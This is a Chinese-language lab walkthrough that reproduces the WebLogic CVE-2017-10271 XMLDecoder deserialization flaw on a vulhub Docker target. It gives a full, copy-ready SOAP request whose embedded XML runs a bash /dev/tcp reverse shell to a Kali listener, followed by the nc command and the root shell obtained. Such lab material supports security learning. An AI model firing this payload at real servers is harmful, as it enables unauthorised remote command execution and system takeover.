漏洞成因
Weblogic的WLS Security组件对外提供 webservice服务
其中使用了XMLDecoder来 解析用户传入的XML数据
靶场部署
1.进入靶场目录
cd /vulhub-master/weblogic/CVE-2017-10271
2.开启靶场【报错重启docker服务】
[root@localhost CVE-2017-10271]# docker-compose up -d
3.查看靶场端口
[root@localhost CVE-2017-10271]# docker ps
4.访问靶场
192.168.10.5:7001
漏洞利用
1.漏洞发生页
192.168.10.5:7001/wls-wsat/CoordinatorPortType
2.配置poc
192.168.10.5 改成你的CentOS IP
192.168.10.128 改成你的Kali IP
8888 改成你的Kali监听端口==========从以下内容开始复制==========
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.10.5:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 640<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i >& /dev/tcp/192.168.10.128/8888 0>&1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
3.kali监听 8888 端口
nc -lvp 8888
4.bp发送poc请求包
修改右上角 Target
粘贴并发送
5.连接建立成功
┌──(root㉿kali)-[~]
└─# nc -lvp 8888
listening on [any] 8888 ...
192.168.10.5: inverse host lookup failed: Unknown host
connect to [192.168.10.128] from (UNKNOWN) [192.168.10.5] 45432
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@af29889df405:~/Oracle/Middleware/user_projects/domains/base_domain#